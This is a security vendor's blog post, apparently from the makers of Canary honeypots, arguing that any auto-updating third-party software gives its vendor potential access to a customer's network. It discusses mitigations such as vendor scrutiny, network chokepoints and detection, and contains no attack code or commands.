If i run your software, can you hack me?

In our previous post (Are Canaries Secure?) we showed (some of) the steps we’ve taken to harden Canary and limit the blast radius from a potential Canary compromise. Colloquially, that post aimed to answer the question: “are Canaries Secure?”

This post aims at another question that pops up periodically: “If I run your Canaries on my network, can you use them to hack me?”

This answer is a little more complicated than the first, as there is some nuance. (Because my brutally honest answer is: “yeah… probably”.)

But this isn’t because Canary gives us special access, it’s true because most of your other vendors can too.If you run software  with an auto update facility (and face it, it’s the gold standard for updates these days), then the main thing stopping that vendor from using that software to gain a foothold on your network is a combination of that vendor's imagination, ethics, or discomfort with the size of jail cells. It may not be a comfortable fact, but fact remains true with no apparent appreciation for our comfort levels.

Over a decade ago we gave two talks on tunneling data in and out of networks through all sorts of weird channels (the pinnacle was a remote timing-based SQL injection to carry TCP packets to internal RDP machines). [“It’s all about the timing”, “Pushing the Camel through the Eye of the Needle”] 


The point is that with a tiny foothold we could expand pretty ridiculously. Sending actual code down to my software that’s already running inside an organization is like shooting fish in a barrel. This doesn’t just affect appliances or devices on your network, it extends to any software.

Consider VLC, the popular video player. Let’s assume it’s installed on your typical corporate desktop. Even if you reversed the hell out of the software to be reasonably sure that the posted binaries aren’t backdoored (which you didn’t), you have no idea what last night’s auto-update brought down with it. 

You don’t allow auto-updates? Congratulations, you now have hundreds of vulnerable video players waiting to be exploited by a random video of cats playing pianos. 

This ignores the fact that even if the video player doesn't download malicious code, it's always a possibility that it simply downloads vulnerable code, which then allows the software to exploit itself.

It’s turtles all the way down.

So what does this mean? Fundamentally it means that if you run software from a 3rd party vendor which accepts auto-updates (and you do) you are accepting the fact that this 3rd party vendor (or anyone who compromises them) probably can pivot from the internet to a position on your network.

Chrome has successfully popularised the concept of silent auto-updates and it’s a good thing, but it’s worth keeping in mind what we give up in exchange for the convenience. (NB. We’re not arguing against auto-updates at all; in fact we think you’d be remiss not enabling them). 
You can mitigate this in general by disabling updates, but that opens you up to a new class of problems with a only handful of solutions:
  • A new model of computation – You could mitigate this by moving to chromebooks or really limited end-user devices. But remember, no third party Chrome apps or extensions, or you fall into the same trap.
  • You can be more circumspect about whose software you run. Ultimately the threat of legal action is what provides the boundaries for contracts and business relationships, which goes a long way in building trust in third parties. If you have a mechanism to recover damages from or lay charges against a vendor for harmful actions, you’ll be more likely to give their software a try. But this still ignores the risk of a vendor being compromised by an unrelated attacker.
  • You can hope to detect when the software you don’t trust does something you don't expect.
For the second solution, software purchasers can demand explanations from their vendors for how code enters the update pipeline, and how its integrity is maintained. We’ve discussed our approach in a previous post. (It’s also why we believe that customers should be more demanding of their vendors!)

The last solution is interesting. We’re  obviously huge fans of detection and previous posts even mention how we detect if our Consoles start behaving unusually. On corporate networks, where the malicious software could be your office phones or your monitors or the lightbulbs, pretty much your only hope is having some way of telling when your kettle is poking around the network.

Ages ago, Marcus Ranum, suggested that a quick diagnostic when inheriting a network would be to implement internal network chokepoints (and to then investigate connections that get choked). We (obviously) think that dropping Canaries are a quick, painless way to achieve the same thing.

It's trite, but still true. Until there are fundamental changes to our methods of computation, our only hope is to “trust, but verify” and on that note, we try hard to be part of the solution instead of the problem.


Comments

Popular posts from this blog

Simple Graphs with Arbor.js

Small things done well¹

Using the Linux Audit System to detect badness